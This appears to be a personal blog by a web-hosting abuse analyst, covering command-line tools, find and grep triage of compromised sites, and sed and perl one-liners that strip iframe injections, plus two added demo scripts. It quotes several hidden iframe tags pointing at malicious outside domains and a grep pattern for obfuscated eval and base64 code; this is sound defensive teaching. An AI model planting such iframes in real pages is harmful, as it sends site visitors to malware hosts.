Monday, January 19, 2009

Basics For the New Year

It's been a while, finals are over, and I'm back from the holidays.

On to some meat! Today I'll cover some of the basics. I use these commands EVERY SINGLE DAY.

I use the standard commands to move around the filesystem. Very quickly, these are ls (list), cd (change directory), pwd (print working directory). Use the man command to find out more uses of these and flesh them out a bit.

I rely on find and grep to turn up most malware on the server. Using find, you have a large number of options. You can search for files created, modified, or accessed at a certain time, owned by certain users, with certain permissions, etc. Find is great for getting an initial file list to check further for malware. One of my most useful find tricks is:

===============================
find . -newer datefile -type f
===============================

This finds all files (-type f) newer than datefile (-newer datefile). On its own, this command is quite useful. I combine it with:

============================================
touch -d "HH:MM:SS Day Month Year" datefile
============================================

I fill in the date using information I've gotten from the client whose site I'm investigating, or from files already on the system. Usually this finds the majority of bad things on the account, but not all. Many times malware or phish sites come zipped and tarred, and the attackers extract them with the original timestamps preserved. This makes using atime|mtime|ctime|newer difficult. For these cases (and several others) I use grep.

If you're in this business and you don't know grep, you've got some learning to do. This tool is invaluable. Grep uses regular expressions (http://en.wikipedia.org/wiki/Regular_expressions), a very powerful pattern language, to search files for patterns. Since I work for a web hosting business, I'm usually looking for iframe injections (<iframe src=), evil eval statements (eval\(), encoded scripts (base64_decode\(|function\(p,a,c,k,e,(r|d)), and javascript that shouldn't be there in general (<script src =|<script langauge=\"JavaScript\"). The strings in the parentheses in the last sentence are the regular expressions grep will search for in the path I specify. See man grep for more info on the neat tricks you can do as far as specifying patterns and paths in alternate ways and output formatting, because this command is VERY versatile. Here's an example (the blog wrapped it):

======================================================
grep -i -H -R -E "<iframe src=|<script src =|<script langauge=\"JavaScript\"|eval\(base64_decode\(|function\(p,a,c,k,e,(r|d)" ./
======================================================

Don't freak, I'll explain :). We'll start with the switches:

======================================================
-i: This tells grep to treat the patterns as case-insensitive.

-H: This tells grep to output the filename the match was found in. Useful if you need to actually track down the abuse instead of just seeing it.

-R: This one's important: it tells grep to search recursively. If the path you give is a directory, grep will normally just search the files in that directory; this option makes grep descend into subdirectories as well.

-E: This one enables egrep-style (extended) regular expressions. It's basically a different syntax for describing the patterns than the basic syntax grep uses by default. It's neither more nor less powerful; it's mostly here for versatility and compatibility. There are other switches like this, check the man page (PLEASE don't get tired of hearing me say this....).

"<sub-pattern>|<sub-pattern>|<sub-pattern>|<sub-pattern>|<sub-pattern>": This is the pattern to search for. The "|" (pipe) characters are directives grep interprets, not literal characters to search for. Read the man page to find out when and what you have to escape when sending grep directives like this; it can be confusing. The "|" directive means "or", so grep will look for any of the sub-patterns joined by the pipes. The last sub-pattern has a pipe inside parentheses. That alternation applies only within the parentheses, so it will find function(p,a,c,k,e,r or function(p,a,c,k,e,d.

./: This is the path to search. I choose the current directory via its alias "./". This is true on most unix systems.
======================================================
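As an added example (not code from the original post), here is the find and grep triage described above run end to end against a small constructed directory: two back-dated clean files and two freshly modified files carrying inert copies of the signatures the grep looks for. It assumes GNU find, grep and touch; the file names, dates and the .invalid domain are made up for the demo, and the script attribute in the pattern is spelled the standard way, language.

```shell
#!/bin/sh
# Added example, not code from the original post. Builds a throwaway directory of
# constructed files and runs the post's two triage steps over it:
#   1. touch -d ... datefile; find ... -newer datefile -type f
#   2. grep -i -H -R -E "<sig>|<sig>|..." ./
# Assumes GNU find/grep/touch (touch -d is a GNU option). Every file name, date
# and domain below is made up for the demo; the "injected" content is inert text.

make_sample_site() {
    dir=$(mktemp -d)
    mkdir -p "$dir/public_html/images"
    printf '<html><body>Hello</body></html>\n' > "$dir/public_html/index.html"
    printf '<?php echo "ok"; ?>\n' > "$dir/public_html/about.php"
    # Two files carrying the signatures the post greps for (constructed, inert).
    printf '<html><iframe src="http://EXAMPLE-BAD.invalid/count.php?o=2" width=0 height=0></iframe></html>\n' \
        > "$dir/public_html/contact.html"
    printf '<?php eval(base64_decode("Y29uc3RydWN0ZWQ="));\n' > "$dir/public_html/images/x.php"
    # Back-date the legitimate files; the two injected ones get a later mtime,
    # as they would after an attacker modified them.
    touch -d "2008-11-01 12:00:00" "$dir/public_html/index.html" "$dir/public_html/about.php"
    touch -d "2008-11-25 09:30:00" "$dir/public_html/contact.html" "$dir/public_html/images/x.php"
    printf '%s\n' "$dir"
}

# Step 1 of the post: every regular file modified after the reference time.
# $1 = sample dir from make_sample_site, $2 = reference time in a form touch -d accepts.
files_newer_than() {
    touch -d "$2" "$1/datefile"
    find "$1/public_html" -newer "$1/datefile" -type f | sort
}

# Step 2 of the post: the signature grep. -H gives file:line so the reviewer
# sees what matched; -l instead would give names only (handy for a cleanup list).
grep_signatures() {
    grep -i -H -R -E '<iframe src=|<script src =|<script language="JavaScript"|eval\(base64_decode\(|function\(p,a,c,k,e,(r|d)' "$1" | sort
}

# Stand-alone demo: pretend the client reported trouble on 20 Nov 2008.
demo=$(make_sample_site)
echo "== files modified after 2008-11-20 =="
files_newer_than "$demo" "2008-11-20 00:00:00"
echo "== signature hits =="
grep_signatures "$demo/public_html"
rm -rf "$demo"
```

Run as a script it prints the two freshly modified files under the first heading and the same two files, with the matching line, under the second; the back-dated clean files appear under neither.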

Wow, what a lot to digest at once! I hope you aren't sweating yet, there's even more to learn in the man pages. We have barely scratched the surface of the uses of these two commands. The find command can run commands on every file it finds, so it can be used with grep directly! That will have to be left for another post though. Enjoy your MLKJ day!

ich1 out.

Wednesday, November 26, 2008

Cleaning Iframe Injections, Lesson 1

Pretty often we get complaints that Google has marked a site as malicious. Usually, like 90% of the time, this is an iframe injection. Sometimes it's a PHP shell, but that's another blog entry. The first step is to grab the page. Please use curl or wget for this. You COULD just surf to it, but we're security professionals, right?

You'll find something like this:

<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Or:

<iframe src="http://pinoc.org/count.php?o=2" </iframe>
<iframe src="http://pinoc.info/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

Or:

<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://yahoo-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="http://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>


Here's a handy perl one-liner for the pinoc domains (courtesy of http://blog.floogy.com/2008/08/fix-pinocorg-and-pinocinfo.html thanks!):

find /PATH/TO/START/FROM/ -type f | xargs perl -pi -e 's/\<iframe src\=\"http\:\/\/pinoc\.info\/count\.php\?o\=2\" width\=0 height\=0 style\=\"hidden\" frameborder\=0 marginheight\=0 marginwidth\=0 scrolling\=no\>\<\/iframe\>\<iframe src\=\"http\:\/\/pinoc\.org\/count\.php\?o\=2\" width\=0 height\=0 style\=\"hidden\" frameborder\=0 marginheight\=0 marginwidth\=0 scrolling\=no\>\<\/iframe\>//g'

To remove using sed instead:

First we make a grep string that catches the whole iframe. I like egrep:

From:

<iframe src="http://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>

To:

grep -HRE "<iframe src=\"http:\/\/google-analyze\.org\/count\.php\?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>"

Note that the only difference between the strings is the domain they access. All of the files and options are the same. We use this to clean everything at once.

grep -HRE "<iframe src=\"http:\/\/.*\/count\.php\?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>" /home/user/*

This should find ALL of the injections. Be sure to redirect the output to a text file for later. The option -lRE makes grep print just the names of the matching files. Now we build our sed line:

sed "s/<iframe src=\"http:\/\/.*\/count.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"

And attach it to our list (you DID make a list of filenames by using -lRE for grep and redirecting the output, right?):

cat ~/thelist.txt | xargs sed "s/<iframe src=\"http:\/\/.*\/count.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"

This feeds thelist.txt to xargs, which runs the sed line on every file in the list. Be sure to fix any paths with spaces or sed will break. If we're lucky, this should result in a clean home directory for your client :). If we aren't, well, hope you backed them up first! Note that without -i sed only writes the cleaned text to standard output; to edit the files in place and keep a backup of each original, add -i.ext to the sed command:

cat ~/thelist.txt | xargs sed -i.shanbak "s/<iframe src=\"http:\/\/.*\/count.php?o=2\" width=0 height=0 style=\"hidden\" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g"


I use shanbak in case the client has other .bak files. This makes cleaning up the backups after you've verified the iframes are gone a piece of cake, and less hazardous to your client's own backups.
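The grep-to-list, then sed -i.shanbak, recipe above as an added example that is not part of the original post. It assumes GNU grep, GNU xargs and a sed that accepts -i.SUFFIX; the two .invalid domains and the paths are constructed, and one directory name contains a space to show how grep -lZ with xargs -0 gets around the path problem mentioned above. It makes one change to the pattern: [^"]* instead of .* for the domain, which keeps a line that carries two injections from being matched as one span.

```shell
#!/bin/sh
# Added example, not code from the original post. Runs the post's cleanup recipe
# (grep -l for a file list, then sed -i.shanbak through xargs) against a constructed
# home directory. Assumes GNU grep (-Z, --exclude), GNU xargs (-0, -r) and a sed
# that accepts -i.SUFFIX (GNU and BSD both do). Domains and paths are constructed.

# The injected tag, with the domain as a placeholder to be filled in per "site".
INJ='<iframe src="http://DOMAIN/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>'

# The post's pattern in basic (not -E) regex syntax, so one string serves both
# grep and sed: ? is literal here, whereas under grep -E it needs the \? the
# post uses. One deliberate change: [^"]* instead of .* for the domain. With .*
# a line holding two injections matches as a single span from the first <iframe
# to the last </iframe>, deleting whatever sits between them; [^"]* cannot run
# past the closing quote of the src attribute. Using | as the sed delimiter
# below means the slashes need no escaping.
PAT='<iframe src="http://[^"]*/count\.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>'

make_sample_home() {
    dir=$(mktemp -d)
    mkdir -p "$dir/public_html/my pages"   # a space: the case the post warns about
    a=$(printf '%s' "$INJ" | sed 's/DOMAIN/bad-one.invalid/')
    b=$(printf '%s' "$INJ" | sed 's/DOMAIN/bad-two.invalid/')
    printf '<html><body>Home</body>%s</html>\n' "$a" > "$dir/public_html/index.html"
    # Two injections on one line, as in the post's second sample.
    printf '<html><body>Old news</body>%s%s</html>\n' "$a" "$b" > "$dir/public_html/my pages/news.html"
    printf '<html><body>Nothing here</body></html>\n' > "$dir/public_html/clean.html"
    printf '%s\n' "$dir"
}

# Step 1: the file list. -l prints names only, -Z ends each with NUL so that
# xargs -0 keeps "my pages/news.html" as one argument; backups are never
# re-scanned, so a second run cannot scrub the originals we kept.
list_infected() {
    grep -lRZ --exclude='*.shanbak' "$PAT" "$1"
}

# Step 2: strip the tag in place, leaving each original as FILE.shanbak.
clean_infected() {
    list_infected "$1" | xargs -0 -r sed -i.shanbak "s|$PAT||g"
}

# Step 3: verification helpers, for the check you do before deleting backups.
count_infected() {
    grep -lR --exclude='*.shanbak' "$PAT" "$1" | wc -l | tr -d ' '
}
count_backups() {
    find "$1" -type f -name '*.shanbak' | wc -l | tr -d ' '
}

# Stand-alone demo.
home=$(make_sample_home)
echo "infected before: $(count_infected "$home/public_html")"
clean_infected "$home/public_html"
echo "infected after:  $(count_infected "$home/public_html")"
echo "backups kept:    $(count_backups "$home/public_html")"
cat "$home/public_html/my pages/news.html"
rm -rf "$home"
```

Run as a script it reports two infected files before and none after, with two .shanbak copies left behind for the verification pass described above; the untouched clean.html gets no backup because it was never in the list.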

ich1 out.

Saturday, November 22, 2008

Schools and Tools

Let's get the preliminaries out of the way:

My name is Shannon Francis, I'm a Computer Science student at a university in Florida. I also work for a web hosting company as an Abuse and Security Analyst. We get to see lots of interesting things and lots of boring, annoying ones, so I'm choosing to blog about them here.

I figure if I fix something and post about it, if someone somewhere finds it and it saves them a bit of time, I've done a mitzvah.

First let's talk about tools.

I do most of my work from a Windows XP machine. I can hear everyone out there tuning out, but bear with me. I work in an office environment and at any time may need to work from more than one computer that isn't my workstation. I chose my tools such that they match up with the majority of the boxes in the office and so that they would easily fit on a thumb drive for maximum portability and minimal hassle. I'm lazy like that :).

We use XMPP at work so I use pidgin (and OTR for encryption) to communicate with co-workers. I use Putty Connection Manager to SSH into servers and open more than one session at a time without cluttering my laptop (that's right, laptop :) too much. I use TrueCrypt to encrypt the drive storing my SSH keys and other important passwords and such. Can't overlook the importance of on-the-fly encryption, especially when you need to remain mobile (leaving valid SSH keys around is just tacky).

Sam Spade comes in handy for just about everything you could need to do before you SSH into a *nix server. I can ping, whois, dig, traceroute, etc., and we have a VPS set up at work for any *nix-y tasks we need to do from the outside of the server we're investigating. I use zenmap as opposed to plain old vanilla nmap (more people just tuned out, probably), mostly because it's what is easy and available in the Windows office environment, but honestly I don't have to use it that often.

Next post I'll talk about what command-line tools I use most and how for the first part of my job: finding the problem.

Saturday, November 15, 2008

Welcome to the Sprawl....

Abandon hope all ye who enter here....